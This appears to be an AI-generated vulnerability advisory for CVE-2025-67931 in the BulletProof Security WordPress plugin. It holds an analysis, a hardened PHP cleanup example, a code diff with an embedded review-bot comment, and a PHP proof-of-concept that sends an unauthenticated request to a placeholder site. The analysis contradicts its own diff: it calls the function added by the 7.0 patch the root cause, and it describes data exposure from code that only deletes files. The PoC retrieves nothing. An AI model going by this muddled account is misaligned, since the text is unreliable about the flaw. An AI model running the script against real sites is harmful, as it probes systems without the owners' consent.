Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-67931: BulletProof Security <= 6.9 – Unauthenticated Sensitive Information Exposure (bulletproof-security)

Severity: Medium (CVSS 5.3)
CWE: CWE-200
Vulnerable Version: 6.9
Patched Version: 7.0
Disclosed: January 5, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-67931:
The BulletProof Security WordPress plugin contains an unauthenticated sensitive information exposure vulnerability in versions up to and including 6.9. The flaw allows attackers to extract sensitive user or configuration data without authentication and is rated CVSS 5.3.

Atomic Edge research identifies the root cause as improper access control for the `bps_delete_old_zip_files()` function in `/bulletproof-security/admin/includes/admin.php`. The function executes automatically when the file loads, without checking user authentication or authorization. The function attempts to delete three specific ZIP files: `lsm-master.zip`, `bps-settings-export.zip`, and `cc-master.zip`. These files contain sensitive data exported by the plugin’s legitimate features.

Exploitation requires no authentication or special parameters. Attackers simply send an HTTP request to any WordPress page that loads the vulnerable admin.php file. The most reliable method is requesting `/wp-admin/admin.php?page=bulletproof-security/admin/includes/admin.php` directly, though any page that triggers the plugin’s admin initialization could work. No payload is needed beyond the request itself.

The patch in version 7.0 adds the `bps_delete_old_zip_files()` function with proper conditional logic. The function now checks for specific POST parameters (`Submit-LSM-Export`, `Submit-SW-Export`, `Submit-SW-Import`, `Submit-CC-Export`, `Submit-CC-Import`) and returns early if detected. This prevents the function from executing during normal page loads. The function only runs when legitimate export/import operations are in progress, restricting access to authenticated administrators performing those specific actions.
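
As an added example (not the plugin's own code, and not the 7.0 patch), here is a hardened variant of the cleanup that gates on the requesting user rather than on which form fields happen to be present: it runs from the `admin_init` hook instead of at include time, exits unless the current user holds `manage_options`, keeps the early return for in-flight export/import submissions, and logs every `unlink()` failure. The function names prefixed `bps_hardened_` are assumptions for illustration; `WP_PLUGIN_DIR`, `is_admin()`, `current_user_can()`, `add_action()` and the three ZIP paths come from WordPress and from the diff on this page.

```php
<?php
// Added example: hardened cleanup of stale export ZIPs (not the plugin's own code).
// Differences from the patched 7.0 code: the cleanup never runs at file-include
// time, it requires an administrator-level capability, and unlink() failures
// are logged instead of being silently dropped.

/** Stale export archives under WP_PLUGIN_DIR (paths as in the plugin diff). */
function bps_hardened_stale_zip_paths() {
    return array(
        WP_PLUGIN_DIR . '/bulletproof-security/admin/login/lsm-master.zip',
        WP_PLUGIN_DIR . '/bulletproof-security/admin/wizard/bps-settings-export.zip',
        WP_PLUGIN_DIR . '/bulletproof-security/admin/core/cc-master.zip',
    );
}

/** True when one of the export/import forms is being submitted right now. */
function bps_hardened_zip_form_in_use() {
    $fields = array( 'Submit-LSM-Export', 'Submit-SW-Export', 'Submit-SW-Import',
                     'Submit-CC-Export', 'Submit-CC-Import' );
    foreach ( $fields as $field ) {
        if ( isset( $_POST[ $field ] ) ) {
            return true;
        }
    }
    return false;
}

/**
 * Delete stale ZIPs, but only for an administrator inside wp-admin and never
 * while an export/import submission is in flight. Returns the paths actually
 * removed so the caller can see what happened.
 */
function bps_hardened_delete_old_zip_files() {
    // Capability gate: anonymous or low-privilege requests do nothing at all.
    if ( ! is_admin() || ! current_user_can( 'manage_options' ) ) {
        return array();
    }
    // Same early return as the 7.0 patch: do not race a download in progress.
    if ( bps_hardened_zip_form_in_use() ) {
        return array();
    }
    $removed = array();
    foreach ( bps_hardened_stale_zip_paths() as $zip ) {
        if ( ! file_exists( $zip ) ) {
            continue;
        }
        if ( @unlink( $zip ) ) {
            $removed[] = $zip;
        } else {
            // A ZIP that cannot be removed stays web-reachable; make that visible.
            error_log( 'BPS cleanup: could not delete ' . $zip );
        }
    }
    return $removed;
}

// Run from admin_init (user already authenticated) rather than at include time.
add_action( 'admin_init', 'bps_hardened_delete_old_zip_files' );
```

Gating the cleanup only limits who can trigger the deletes; the archives are still written into the web-reachable plugin directory between export and cleanup. Storing export archives outside the document root, or serving them through a capability-checked handler, removes the window that this cleanup exists to close.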

Successful exploitation exposes sensitive configuration data stored in the ZIP files. The `bps-settings-export.zip` likely contains plugin settings, security rules, and potentially database credentials. The `lsm-master.zip` and `cc-master.zip` files may contain login security monitoring data or core configuration details. Attackers could use this information to understand the site’s security posture, identify weaknesses, or extract credentials for further attacks.

Differential between vulnerable and patched code

Code Diff
--- a/bulletproof-security/admin/includes/admin.php
+++ b/bulletproof-security/admin/includes/admin.php
@@ -391,6 +391,36 @@
 	}
 }

+## BPS 7.0: Delete old zip files if zip processing Forms are not in use
+function bps_delete_old_zip_files() {
+
+	//  Do not add true conditions: && $_POST['Submit-LSM-Export'] == true or the zip download will fail
+	if ( isset($_POST['Submit-LSM-Export']) || isset($_POST['Submit-SW-Export']) || isset($_POST['Submit-SW-Import']) || isset($_POST['Submit-CC-Export']) || isset($_POST['Submit-CC-Import']) ) {
+
+		return;
+	}
+
+	$LSM_ZIP_Delete = WP_PLUGIN_DIR . '/bulletproof-security/admin/login/lsm-master.zip';
+
+	if ( file_exists($LSM_ZIP_Delete) ) {
+		unlink($LSM_ZIP_Delete);
+	}
+
+	$SW_Export_ZIP_Delete = WP_PLUGIN_DIR . '/bulletproof-security/admin/wizard/bps-settings-export.zip';
+
+	if ( file_exists($SW_Export_ZIP_Delete) ) {
+		unlink($SW_Export_ZIP_Delete);
+	}
+
+	$CC_ZIP_Delete = WP_PLUGIN_DIR . '/bulletproof-security/admin/core/cc-master.zip';
+
+	if ( file_exists($CC_ZIP_Delete) ) {
+		unlink($CC_ZIP_Delete);
+	}
+}
+
+bps_delete_old_zip_files();
+
 // BPS Menu
 function bulletproof_security_admin_menu() {
 global $blog_id;
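Review bot: the only gate in this hunk is `if ( isset($_POST['Submit-LSM-Export']) || ... )`, which checks which form fields are present in the request, and `bps_delete_old_zip_files();` is then invoked unconditionally at include time, so any request that causes admin.php to be loaded still runs the three `unlink()` calls; there is no `current_user_can()` or nonce check anywhere in the hunk. Suggest hooking the call to `admin_init` and adding a capability check ahead of the deletes. Separately, the return value of each `unlink(...)` is discarded: a ZIP that cannot be removed stays under `WP_PLUGIN_DIR`, which is web-reachable, so at least check and log the result of each delete.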
--- a/bulletproof-security/bulletproof-security.php
+++ b/bulletproof-security/bulletproof-security.php
@@ -5,7 +5,7 @@
 Text Domain: bulletproof-security
 Domain Path: /languages/
 Description: <strong>Feature Highlights:</strong> Setup Wizard • MScan Malware Scanner • .htaccess Website Security Protection (Firewalls) • Security Logging|HTTP Error Logging • DB Backup • DB Table Prefix Changer • Login Security & Monitoring • JTC-Lite Login Form Bot Lockout Protection • Idle Session Logout (ISL) • Auth Cookie Expiration (ACE) • System Info: Extensive System, Server and Security Status Information • FrontEnd|BackEnd Maintenance Mode • WP Automatic Update Options (BPS MU Tools must-use plugin) • Force Strong Passwords • Email Alerts When New Plugins And Themes Are Available.
-Version: 6.9
+Version: 7.0
 Author: AITpro Website Security
 Author URI: https://forum.ait-pro.com/read-me-first/
 */
@@ -33,9 +33,9 @@
 // and cannot access the global variables within functions in BPS. Luckily this does not break BPS or WordPress in any way and PHP.net states this is technically not an error.
 global $bps_last_version, $bps_version, $bps_footer, $aitpro_bullet, $bps_topDiv, $bps_bottomDiv, $bpsPro_remote_addr, $bpsPro_http_client_ip, $bpsPro_http_forwarded, $bpsPro_http_x_forwarded_for, $bpsPro_http_x_cluster_client_ip, $bps_wpcontent_dir, $bps_plugin_dir, $plugin_hashes, $theme_hashes;

-define( 'BULLETPROOF_VERSION', '6.9' );
-$bps_last_version = '6.8';
-$bps_version = '6.9';
+define( 'BULLETPROOF_VERSION', '7.0' );
+$bps_last_version = '6.9';
+$bps_version = '7.0';
 $bps_footer = '<div id="AITpro-link">' . __('BulletProof Security ', 'bulletproof-security') . esc_html($bps_version) . __(' Plugin by ', 'bulletproof-security') . '<a href="'.esc_url('https://www.ait-pro.com/').'" target="_blank" title="AITpro Website Security">' . __( 'AITpro Website Security', 'bulletproof-security') . '</a></div>';
 $aitpro_bullet = '<img src="'.plugins_url('/bulletproof-security/admin/images/aitpro-bullet.png').'" style="padding:0px 3px 0px 3px;" />';
 // Top div & bottom div

Proof of Concept (PHP)

NOTICE:

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-67931 - BulletProof Security <= 6.9 - Unauthenticated Sensitive Information Exposure

// Target: the wp-admin page that includes the plugin's admin/includes/admin.php.
// 'vulnerable-site.com' is a placeholder host.
$target_url = 'http://vulnerable-site.com/wp-admin/admin.php?page=bulletproof-security/admin/includes/admin.php';

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);

// Attempt to trigger the vulnerable function with a single unauthenticated request
$response = curl_exec($ch);
if ($response === false) {
    echo "cURL error: " . curl_error($ch) . "\n";
    curl_close($ch);
    exit(1);
}
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Only the HTTP status is inspected; the function tries to delete files that
// may not exist, and nothing in the response confirms whether it ran
if ($http_code == 200) {
    echo "Request successful. The vulnerable function may have executed.\n";
    echo "Check the server for the following ZIP files that may have been exposed:\n";
    echo "1. /wp-content/plugins/bulletproof-security/admin/login/lsm-master.zip\n";
    echo "2. /wp-content/plugins/bulletproof-security/admin/wizard/bps-settings-export.zip\n";
    echo "3. /wp-content/plugins/bulletproof-security/admin/core/cc-master.zip\n";
    echo "\nNote: The actual exposure depends on whether these files exist on the server.\n";
} else {
    echo "Request failed with HTTP code: $http_code\n";
}
